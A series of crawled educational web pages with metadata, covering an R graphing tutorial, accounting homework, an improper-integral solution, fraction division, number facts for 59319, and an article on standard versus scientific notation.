year for Pennsylvania, we can make a scatterplot comparing different drinks in each year. For this example, we’ll compare liquor to beer sales.\n\n``````ggplot(penn_alcohol, aes(\nx = number_of_shots_liquor,\ny = number_of_beers\n)) +\ngeom_point()``````", null, "This graph shows us that when liquor consumption increases, beer consumption also tends to increase.\n\nWhile scatterplots can help show the relationship between variables, we lose the information of how consumption changes over time.\n\n## 14.5 Color blindness\n\nPlease keep in mind that some people are color blind so graphs (or maps, which we will learn about soon) will be hard to read for these people if we choose bad colors. A helpful site for choosing colors for graphs and maps is Color Brewer.", null, "This site lets you select which type of colors you want (sequential and diverging, such as shades in a hotspot map, and qualitative, such as for data like what we used in this lesson). In the “Only show:” section you can set it to “colorblind safe” to restrict it to colors that allow people with color blindness to read your graph. To the right of this section it shows the HEX codes for each color. A HEX code is just a code that a computer can read and know exactly which color it is.\n\nLet’s use an example of a color-blind friendly color from the “qualitative” section of ColorBrewer. We have three options on this page (we can change how many colors we want but it defaults to showing 3): green (HEX = #1b9e77), orange (HEX = #d95f02), and purple (HEX = #7570b3). We’ll use the orange and purple colors. To manually set colors in `ggplot()` we use `scale_color_manual(values = c())` and include a vector of color names or HEX codes inside the `c()`. Doing that using the orange and purple HEX codes will change our graph colors to these two colors.\n\n``````ggplot(penn_alcohol, aes(\nx = year,\ny = number_of_glasses_wine,\ncolor = \"Glasses of Wine\"\n)) +\ngeom_line() +\ngeom_line(aes(\nx = year,\ny = number_of_shots_liquor,\ncolor = \"Shots of Liquor\"\n)) +\nlabs(color = \"Alcohol Type\") +\ntheme(legend.position = \"bottom\") +\nscale_color_manual(values = c(\"#7570b3\", \"#d95f02\"))``````", null, "" ]
[ null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-316-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-318-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-319-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-320-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-321-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-322-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-323-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-324-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-325-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-326-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-327-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-328-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-329-1.png", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-330-1.png", null, "https://crimebythenumbers.com/images/colorbrewer.PNG", null, "https://crimebythenumbers.com/_main_files/figure-html/unnamed-chunk-332-1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85248405,"math_prob":0.9854493,"size":11863,"snap":"2022-27-2022-33","text_gpt3_token_len":3155,"char_repetition_ratio":0.14276077,"word_repetition_ratio":0.10774578,"special_character_ratio":0.28028324,"punctuation_ratio":0.11247803,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9883555,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,5,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-19T04:07:18Z\",\"WARC-Record-ID\":\"<urn:uuid:e903d5af-5410-493d-8803-a30834521a97>\",\"Content-Length\":\"83816\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:db9ec321-ed3c-4057-9f2b-e2df95bd013a>\",\"WARC-Concurrent-To\":\"<urn:uuid:97c63d71-e74d-4c5f-8eb5-2fe8ad59fc2e>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"https://crimebythenumbers.com/graphing-intro.html\",\"WARC-Payload-Digest\":\"sha1:6C4QEDXY2FSNMZE7LK62NELUPW7VCDJ5\",\"WARC-Block-Digest\":\"sha1:GAFX4OYCPG65KSLQMK32FAKOLSCW7NEH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573623.4_warc_CC-MAIN-20220819035957-20220819065957-00252.warc.gz\"}"}
https://mr-mathematics.com/product/using-real-life-graphs/
[ "# Using Real Life Graphs\n\nStudents learn how to model situations or procedures using real life graphs.  Learning progresses from drawing the real life graph when given the y-intercept value to finding the equation of the line to model the situation as an equation.\n##### Differentiated Learning Objectives\n• All students should be able to complete a table of results when given a rule.\n• Most students should be able to use a straight-line graph model a mathematical procedure.\n• Some students should be able to model situations or procedures by translating them into formulae and by using graphs.\nSKU: 763\n\n### Mr Mathematics Blog\n\n#### Problem Solving Maths Lessons\n\nFour new problem solving lessons to develop student’s mathematical reasoning and communication skills.\n\n#### Teaching in a Bubble\n\nPractical tips and advice for preparing to teach in year group bubbles.\n\n#### Problem Solving – Perimeter and Area\n\nStudents are challenged to apply the rules of arithmetic to a series of real-life, functional problems." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9009964,"math_prob":0.82144964,"size":326,"snap":"2020-34-2020-40","text_gpt3_token_len":62,"char_repetition_ratio":0.1521739,"word_repetition_ratio":0.06,"special_character_ratio":0.18404908,"punctuation_ratio":0.054545455,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98728687,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-13T23:07:07Z\",\"WARC-Record-ID\":\"<urn:uuid:b853105f-ec85-4d59-bc9b-772da6cac834>\",\"Content-Length\":\"72102\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d026038f-9e1e-4e46-b616-190a24f2811a>\",\"WARC-Concurrent-To\":\"<urn:uuid:80882b63-1033-453c-b7d1-52e188a314db>\",\"WARC-IP-Address\":\"68.66.200.219\",\"WARC-Target-URI\":\"https://mr-mathematics.com/product/using-real-life-graphs/\",\"WARC-Payload-Digest\":\"sha1:7SNO5GWKLBIWAQ2ZMGAQZCURRPHQXGNQ\",\"WARC-Block-Digest\":\"sha1:4HZZKWB46T26LY65K5PVQ2ZM2SFZWNWR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439739104.67_warc_CC-MAIN-20200813220643-20200814010643-00201.warc.gz\"}"}
https://studylib.net/doc/25417199/assignment-1
[ "# Assignment 1", null, "```College of Business Administration, University of Sharjah\nMgt. Acc. and Control Systems - 0306613\nFall Semester (2019/2020)\nAssignment 1\nMustafa Al Rashedi\nU19102890\n1)\nUnits produced and sold\nParticulars\n80,000\n100,000\n120,000\nVariable Cost\nFixed Costs\n240,000.00\n320,000.00\n560,000.00\n300,000.00\n320,000.00\n620,000.00\n360,000.00\n320,000.00\n680,000.00\nVariable Cost\nFixed Costs\n3\n4\n7\n3\n3.2\n6.2\n3\n2.67\n5.67\nTotal Costs\nTotal Costs\nCost per unit\nTotal Cost per unit\n\n\n\n\nVariable cost per unit is = 240,000/80,000 = AED 3.00 per unit\nVariable cost at AED 3.00 per unit remains same irrespective of units produced.\nSo, the Variable Cost per unit remains same in all 3 cases.\nSince units produced differ – FC per unit changes to AED 3.2 and AED 2.67 when\nproduction increases to 100,000 and 120,000 respectively\n2)\nContribution Income format\nParticulars\nAmount (in \\$)\nSales\n715,000.00\n(-) Variable Expenses\n330,000.00\nContribution Margin\n385,000.00\n(-) Fixed Expenses\n320,000.00\nNet Operating Income\n65,000.00\n\nSales = Units produced x Selling price\n110,000 units x \\$6.50 = \\$715,000\n\nVariable expenses = Units produced x Variable cost per unit\n110,000 units x \\$3 = \\$330,000\n\nContribution Margin = Sales – Variable Expenses\n\\$715,000-\\$330,000 = \\$385,000\n\nFixed expenses remain same at \\$320,000\n\nNet Operating Income = Contribution Margin – Fixed Expenses\n\\$385,000-\\$320,000 = \\$65,000.\n```" ]
[ null, "https://s3.studylib.net/store/data/025417199_1-e4b8fe48451b89b8ddc860080dfed72c-768x994.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69918144,"math_prob":0.9912426,"size":1368,"snap":"2021-43-2021-49","text_gpt3_token_len":413,"char_repetition_ratio":0.19354838,"word_repetition_ratio":0.0,"special_character_ratio":0.42909357,"punctuation_ratio":0.1968254,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9799806,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-16T03:56:34Z\",\"WARC-Record-ID\":\"<urn:uuid:38217c94-6a9b-4107-8f80-028f236b9489>\",\"Content-Length\":\"40769\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9ca5f2fe-3f27-4f0c-93c4-add3e63735aa>\",\"WARC-Concurrent-To\":\"<urn:uuid:178cbfdf-2484-4877-b457-8887d3663615>\",\"WARC-IP-Address\":\"172.67.175.240\",\"WARC-Target-URI\":\"https://studylib.net/doc/25417199/assignment-1\",\"WARC-Payload-Digest\":\"sha1:RYDGLJYWXYCVSCPHFF2F3MP2523DMIBB\",\"WARC-Block-Digest\":\"sha1:HIZP53JFV2ERJJYY5NYSS6CL3C3NJI32\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323583408.93_warc_CC-MAIN-20211016013436-20211016043436-00555.warc.gz\"}"}
https://socratic.org/questions/how-do-you-show-whether-the-improper-integral-int-x-2-e-x-3-dx-converges-or-dive
[ "# How do you show whether the improper integral int (x^2)(e^(-x^3)) dx converges or diverges from negative infinity to infinity?\n\nOct 8, 2015\n\nSee the explanation section, below.\n\n#### Explanation:\n\nWe need (among other things):\n\n${\\lim}_{u \\rightarrow - \\infty} {e}^{u} = 0$ and ${\\lim}_{u \\rightarrow \\infty} {e}^{u} = \\infty$.\n\nLet's note that $\\int {x}^{2} {e}^{- {x}^{3}} \\mathrm{dx} = - \\frac{1}{3} {e}^{- {x}^{3}} + C$.\n(By substitution with $u = {x}^{3}$.)\n\nWe also note that to (attempt to) evaluate an integral that is improper at both limits of integration, we need to breack the interval into two pieces using ${\\int}_{a}^{b} f \\left(x\\right) \\mathrm{dx} = {\\int}_{a}^{c} f \\left(x\\right) \\mathrm{dx} + {\\int}_{c}^{b} f \\left(x\\right) \\mathrm{dx}$.\n\nLet's use $c = 0$, (Because that makes the exponential easy to evaluate.)\n\n${\\int}_{-} {\\infty}^{\\infty} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx} = {\\int}_{-} {\\infty}^{0} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx} + {\\int}_{0}^{\\infty} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx}$ $\\text{ }$ (If both integrals exist.)\n\n${\\int}_{-} {\\infty}^{0} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx} = {\\lim}_{a \\rightarrow - \\infty} {\\int}_{a}^{0} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx}$\n\n = lim_(ararr-oo) ((-1/3e^(-x^3))]_a^0)\n\n$= {\\lim}_{a \\rightarrow - \\infty} \\left(- \\frac{1}{3} + \\frac{1}{3} {e}^{- {a}^{3}}\\right)$\n\nAs $a \\rightarrow - \\infty$, the exponent $- {a}^{3} \\rightarrow \\infty$ so the integral diverges.\n\nWe conclude that the original integral, ${\\int}_{-} {\\infty}^{\\infty} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx}$ diverges.\n\nNote\nBy the way, the other integral, ${\\int}_{0}^{\\infty} \\left({x}^{2}\\right) \\left({e}^{- {x}^{3}}\\right) \\mathrm{dx} = \\frac{1}{3}$\n\nAlso, we might have noted before integrating, that\nas $x \\rightarrow - \\infty$,\nthe integrand ${x}^{2} {e}^{- {x}^{3}} \\rightarrow \\infty$.\nSo. there was no chance of the integral left of zero being finite.\n\nHere is the graph of the function:\n\ngraph{x^2 e^(-x^3) [-12.87, 32.78, -4.08, 18.77]}" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80025524,"math_prob":1.0000064,"size":852,"snap":"2022-27-2022-33","text_gpt3_token_len":250,"char_repetition_ratio":0.1273585,"word_repetition_ratio":0.0,"special_character_ratio":0.29929578,"punctuation_ratio":0.118644066,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99998677,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-18T01:16:55Z\",\"WARC-Record-ID\":\"<urn:uuid:a368fdc6-7da2-4930-8f28-09f3e9327487>\",\"Content-Length\":\"37277\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3d6d763b-6764-4fdf-b42f-9f64d49167db>\",\"WARC-Concurrent-To\":\"<urn:uuid:eb3c4e31-d25e-41d7-a98d-129e12bba53e>\",\"WARC-IP-Address\":\"216.239.34.21\",\"WARC-Target-URI\":\"https://socratic.org/questions/how-do-you-show-whether-the-improper-integral-int-x-2-e-x-3-dx-converges-or-dive\",\"WARC-Payload-Digest\":\"sha1:REAQVKO5ES3RS6H5GPY67557SAVQSKJC\",\"WARC-Block-Digest\":\"sha1:DIMQPWEKQO4YOCG6VDS6AWIZ55XYBXIM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573145.32_warc_CC-MAIN-20220818003501-20220818033501-00637.warc.gz\"}"}
https://answers.everydaycalculation.com/divide-fractions/10-15-divided-by-6-70
[ "Solutions by everydaycalculation.com\n\n## Divide 10/15 with 6/70\n\n10/15 ÷ 6/70 is 70/9.\n\n#### Steps for dividing fractions\n\n1. Find the reciprocal of the divisor\nReciprocal of 6/70: 70/6\n2. Now, multiply it with the dividend\nSo, 10/15 ÷ 6/70 = 10/15 × 70/6\n3. = 10 × 70/15 × 6 = 700/90\n4. After reducing the fraction, the answer is 70/9\n5. In mixed form: 77/9\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.824296,"math_prob":0.9126905,"size":340,"snap":"2021-31-2021-39","text_gpt3_token_len":152,"char_repetition_ratio":0.22321428,"word_repetition_ratio":0.0,"special_character_ratio":0.5176471,"punctuation_ratio":0.061728396,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9669371,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-27T05:44:59Z\",\"WARC-Record-ID\":\"<urn:uuid:4c6ac205-5f24-4172-a0ab-d8c6105f8a0d>\",\"Content-Length\":\"7931\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bb352da1-3948-409a-ad94-94a6b2483b6e>\",\"WARC-Concurrent-To\":\"<urn:uuid:5b51c45c-6e0f-4d9f-a224-30b80de55219>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/divide-fractions/10-15-divided-by-6-70\",\"WARC-Payload-Digest\":\"sha1:GMETAMHX2J35WC42QZXPO2GVYML6PYKO\",\"WARC-Block-Digest\":\"sha1:QQBDVAZZWQVBCX5GBCX5B6XNE4BLPHSW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152236.64_warc_CC-MAIN-20210727041254-20210727071254-00164.warc.gz\"}"}
https://curate.nd.edu/catalog?f%5Badmin_unit_hierarchy_sim%5D%5B%5D=University+of+Notre+Dame%3ACollege+of+Science%3AMathematics&f%5Bdesc_metadata__affiliation_sim%5D%5B%5D=Faculty&f%5Bdesc_metadata__creator_sim%5D%5B%5D=Rene+De+Vogelaere&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Doctoral+Dissertation&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Master%27s+Thesis&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Image&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Article&path_only=true
[ "# Mathematics\n\nSearch CurateND\n\n### List of files deposited in CurateND that match your search criteria\n\n• Author(s):\nRene De Vogelaere\nAbstract:\n\nHamilton equations are such that the relation, between the coordinates and momenta at time t and at time t 0, is a contact transformation. Methods of integration of Hamilton equations, which do preserve the contact transformation property are given here. These methods are of first and second order. They are given, for the equation x= f(x,t), then for the case of one degree of freedom, then for the general case. Some of the formulae are implicit.\n\nDate Published:\n1956-04\nRecord Visibility:\nPublic" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85269153,"math_prob":0.927158,"size":807,"snap":"2020-10-2020-16","text_gpt3_token_len":188,"char_repetition_ratio":0.0996264,"word_repetition_ratio":0.0,"special_character_ratio":0.2267658,"punctuation_ratio":0.12666667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95806646,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-03-28T21:10:56Z\",\"WARC-Record-ID\":\"<urn:uuid:31d6acf4-b9fa-4589-a08c-df884eca2e84>\",\"Content-Length\":\"24829\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:83675272-355f-4e51-a6ee-1e76b358fdf9>\",\"WARC-Concurrent-To\":\"<urn:uuid:c5722b3c-817f-4dc0-a5ec-02e6e1848655>\",\"WARC-IP-Address\":\"129.74.223.90\",\"WARC-Target-URI\":\"https://curate.nd.edu/catalog?f%5Badmin_unit_hierarchy_sim%5D%5B%5D=University+of+Notre+Dame%3ACollege+of+Science%3AMathematics&f%5Bdesc_metadata__affiliation_sim%5D%5B%5D=Faculty&f%5Bdesc_metadata__creator_sim%5D%5B%5D=Rene+De+Vogelaere&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Doctoral+Dissertation&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Master%27s+Thesis&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Image&f_inclusive%5Bhuman_readable_type_sim%5D%5B%5D=Article&path_only=true\",\"WARC-Payload-Digest\":\"sha1:M3SXCAIUZWLH3SUFZBQ352LYOHCM7BG7\",\"WARC-Block-Digest\":\"sha1:5ZZTUSRXBHWKZLPTA7GFO5FLHCJENPVR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370493120.15_warc_CC-MAIN-20200328194743-20200328224743-00172.warc.gz\"}"}
https://numbermatics.com/n/59319/
[ "# 59319\n\n## 59,319 is an odd composite number composed of two prime numbers multiplied together.\n\nWhat does the number 59319 look like?\n\nThis visualization shows the relationship between its 2 prime factors (large circles) and 16 divisors.\n\n59319 is an odd composite number. It is composed of two distinct prime numbers multiplied together. It has a total of sixteen divisors.\n\n## Prime factorization of 59319:\n\n### 33 × 133\n\n(3 × 3 × 3 × 13 × 13 × 13)\n\nSee below for interesting mathematical facts about the number 59319 from the Numbermatics database.\n\n### Names of 59319\n\n• Cardinal: 59319 can be written as Fifty-nine thousand, three hundred nineteen.\n\n### Scientific notation\n\n• Scientific notation: 5.9319 × 104\n\n### Factors of 59319\n\n• Number of distinct prime factors ω(n): 2\n• Total number of prime factors Ω(n): 6\n• Sum of prime factors: 16\n\n### Divisors of 59319\n\n• Number of divisors d(n): 16\n• Complete list of divisors:\n• Sum of all divisors σ(n): 95200\n• Sum of proper divisors (its aliquot sum) s(n): 35881\n• 59319 is a deficient number, because the sum of its proper divisors (35881) is less than itself. Its deficiency is 23438\n\n### Bases of 59319\n\n• Binary: 11100111101101112\n• Base-36: 19RR\n\n### Squares and roots of 59319\n\n• 59319 squared (593192) is 3518743761\n• 59319 cubed (593193) is 208728361158759\n• The square root of 59319 is 243.5549219375\n• 59319 is a perfect cube number. Its cube root is 39\n\n### Scales and comparisons\n\nHow big is 59319?\n• 59,319 seconds is equal to 16 hours, 28 minutes, 39 seconds.\n• To count from 1 to 59,319 would take you about sixteen hours.\n\nThis is a very rough estimate, based on a speaking rate of half a second every third order of magnitude. If you speak quickly, you could probably say any randomly-chosen number between one and a thousand in around half a second. Very big numbers obviously take longer to say, so we add half a second for every extra x1000. (We do not count involuntary pauses, bathroom breaks or the necessity of sleep in our calculation!)\n\n• A cube with a volume of 59319 cubic inches would be around 3.3 feet tall.\n\n### Recreational maths with 59319\n\n• 59319 backwards is 91395\n• 59319 is a Harshad number.\n• The number of decimal digits it has is: 5\n• The sum of 59319's digits is 27\n• More coming soon!\n\nMLA style:\n\"Number 59319 - Facts about the integer\". Numbermatics.com. 2023. Web. 28 March 2023.\n\nAPA style:\nNumbermatics. (2023). Number 59319 - Facts about the integer. Retrieved 28 March 2023, from https://numbermatics.com/n/59319/\n\nChicago style:\nNumbermatics. 2023. \"Number 59319 - Facts about the integer\". https://numbermatics.com/n/59319/\n\nThe information we have on file for 59319 includes mathematical data and numerical statistics calculated using standard algorithms and methods. We are adding more all the time. If there are any features you would like to see, please contact us. Information provided for educational use, intellectual curiosity and fun!\n\nKeywords: Divisors of 59319, math, Factors of 59319, curriculum, school, college, exams, university, Prime factorization of 59319, STEM, science, technology, engineering, physics, economics, calculator, fifty-nine thousand, three hundred nineteen.\n\nOh no. Javascript is switched off in your browser.\nSome bits of this website may not work unless you switch it on." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83961344,"math_prob":0.95520896,"size":2705,"snap":"2023-14-2023-23","text_gpt3_token_len":715,"char_repetition_ratio":0.11847464,"word_repetition_ratio":0.025229357,"special_character_ratio":0.31608135,"punctuation_ratio":0.16412213,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9858744,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-28T02:54:22Z\",\"WARC-Record-ID\":\"<urn:uuid:740a093f-e62a-40a9-8d6c-8b33a979f036>\",\"Content-Length\":\"18229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c42ff5a-d40e-4b9b-a462-2a781806ffdb>\",\"WARC-Concurrent-To\":\"<urn:uuid:70f8f734-a6f4-45c8-b5eb-41592f10a95a>\",\"WARC-IP-Address\":\"72.44.94.106\",\"WARC-Target-URI\":\"https://numbermatics.com/n/59319/\",\"WARC-Payload-Digest\":\"sha1:LVOP46XXLMDLD5SCKVRPZALUY574R6PS\",\"WARC-Block-Digest\":\"sha1:Z55BMIIYCMQWJDMUU6K6CPNAXUJYDVPZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296948756.99_warc_CC-MAIN-20230328011555-20230328041555-00771.warc.gz\"}"}
https://replichemoncler.com/what-is-half-of-45/
[ "# What Is Half Of 45\n\nWhat is Half of 45?\nHave you ever been asked what is half of 45? This is a fairly common math question, but it is important to understand the answer so you can solve other math problems. Half of 45 is 22.5. Knowing how to divide by two is essential for understanding more complex math problems. In this article, we will discuss what half of 45 is and how you can calculate the answer yourself.\n\n## What Is Half of 45?\n\nContents\n\nThe answer to the question “what is half of 45?” is 22.5. To calculate this, you have to divide 45 by 2. Dividing by two is the same as halving a number. So, if you want to know what half of 45 is, you simply have to divide 45 by 2. This will give you the answer of 22.5.\n\n## How to Calculate Half of 45\n\nCalculating half of 45 is relatively easy. All you have to do is divide 45 by 2. This can be done using a calculator, or you can do it by hand.\n\nIf you are doing it by hand, the first step is to write the number 45 on a piece of paper. Then, divide the two digits of the number in half. So, for 45, you would divide the 4 in half, which would be 2, and the 5 in half, which would be 2.5. Then, combine the two numbers together and you have your answer: 22.5." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9612437,"math_prob":0.9765822,"size":6449,"snap":"2023-14-2023-23","text_gpt3_token_len":1689,"char_repetition_ratio":0.14072925,"word_repetition_ratio":0.07324595,"special_character_ratio":0.26918903,"punctuation_ratio":0.10493827,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999393,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-23T04:39:13Z\",\"WARC-Record-ID\":\"<urn:uuid:af096aac-73b6-487e-8480-5630bf7eb795>\",\"Content-Length\":\"76144\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f0cd307f-5c96-4462-aef2-43b3cd3f3981>\",\"WARC-Concurrent-To\":\"<urn:uuid:b0408a49-3ae9-43c7-91db-3195e59d7ef1>\",\"WARC-IP-Address\":\"161.97.92.136\",\"WARC-Target-URI\":\"https://replichemoncler.com/what-is-half-of-45/\",\"WARC-Payload-Digest\":\"sha1:LHOEPEZCY3XDJBXHF3XUFQJVS5RWGCV7\",\"WARC-Block-Digest\":\"sha1:JXGM7NCCAPZVRWUVH2L4UBVCIQOR5IIM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296944996.49_warc_CC-MAIN-20230323034459-20230323064459-00584.warc.gz\"}"}
https://askanydifference.com/difference-between-standard-form-and-scientific-form/
[ "# Standard Form vs Scientific Form: Difference and Comparison\n\nA framework of symbols of mathematical information and concepts is known as a mathematical notation. Maths, the physical sciences, engineering, as well as finance all use mathematical notations.\n\n/10\n\nScience Quiz\n\n1 / 10\n\nThe first link in all food chains is-\n\n2 / 10\n\nWhich of the following is used in pencils?\n\n3 / 10\n\nWhat is the PH of H2O?\n\n4 / 10\n\nWhere does photosynthesis take place?\n\n5 / 10\n\nName the metal which is easily cut by a simple knife?\n\n6 / 10\n\nWhat is laughing gas?\n\n7 / 10\n\nWhich among the following is not a synthetic fiber?\n\n8 / 10\n\nThe purpose of choke in tube light is?\n\n9 / 10\n\nName the fabric which is used in making bulletproof jackets?\n\n10 / 10\n\nPermanent hardness of water may be removed by the addition of\n\nThe two most widely used forms of notations are Scientific and Standard Notation.\n\n## Key Takeaways\n\n1. Standard form refers to the typical way of writing numbers using digits, while scientific form (scientific notation) expresses numbers as a product of a coefficient and a power of ten.\n2. The standard form is more suitable for everyday use and simpler calculations, whereas the scientific form is ideal for representing very large or small numbers.\n3. Scientific form simplifies complex calculations and makes comparing numbers with vastly different magnitudes easier.\n\n## Standard Form vs Scientific Form\n\nThe difference between Standard form and Scientific form is that the latter (also known as scientific form, standard index format, or standard form within the United Kingdom) is a way of representing numbers, which are too large or too small to be represented in decimal form. On the other hand, the standard technique of representing numerals is in standard notation.\n\nStandard form is a method of conveniently jotting down extremely large or very small figures. 4*103 equals 4000 since 103= 1000. As a result, 4000 could be represented as 4*103.\n\nThis concept can also be used to quickly note down significantly larger quantities in standard form. Smaller units can be expressed in standard form as well.\n\nScientific notation (also known as the standard form as well as exponential notation) is a method of writing numbers that allow for quantities that are too big or small to be represented in regular decimal notation.\n\nThe expression of a quantity in its ‘normal’ format is referred to as standard notation.\n\n## What is Standard Form?\n\nA standard notation shows a method of writing a particular number, computation, or statement in a specific format that meets the specified criteria. 4.5 billion years, for instance, is expressed as 4,500,000,000 years.\n\nAs one can see, expressing a huge number such as 4.5 billion in its numerical form would be not only unclear but also time-consuming because there is a potential that we will record a few zeros lesser or more.\n\nAs a result, people employ standard notation to express very big or very short values succinctly.\n\nIn the United Kingdom, standard notation is also referred to as scientific notation and is often used to write numbers in the order of powers of ten. The standard notation will differ based on the logical idea at hand.\n\nDepending on the nation a person is in, the standard form has varied connotations. Also, the Standard Notation is the most common style of writing numerals in the decimal system in the USA and other countries that use US norms.\n\n## What is Scientific Notation?\n\nScientific notation is a way of showing numbers, which are either too large or too little to be represented in decimal notation. In the United Kingdom, it’s also known as the ‘scientific format.’\n\nOften, it’s used by researchers, mathematicians, including engineers for computations involving large numbers. Nonzero values are expressed in scientific notation as:\n\nm × 10*n\n\nor m multiplied by ten scaled to the degree of n, wherein n is an integer, as well as m, is a non-zero real number. This same integer n is referred to as the exponents, as well as the real number m is referred to as the significand or mantissa.\n\nAs noted in the beginning, scientific notation allows us to represent very large or small numbers by multiplying single-digit integers by 10 raised to the order of the relevant exponent.\n\nIf somehow the value is very large, the exponential part is positive; otherwise, it is negative.\n\n## Main Differences Between Standard Form and Scientific Notation\n\n1. The Standard form is commonly used to indicate exceedingly big or small values as well as quantities. The Scientific Form, from the other end, is often used to describe exceedingly big or small quantities in decimal 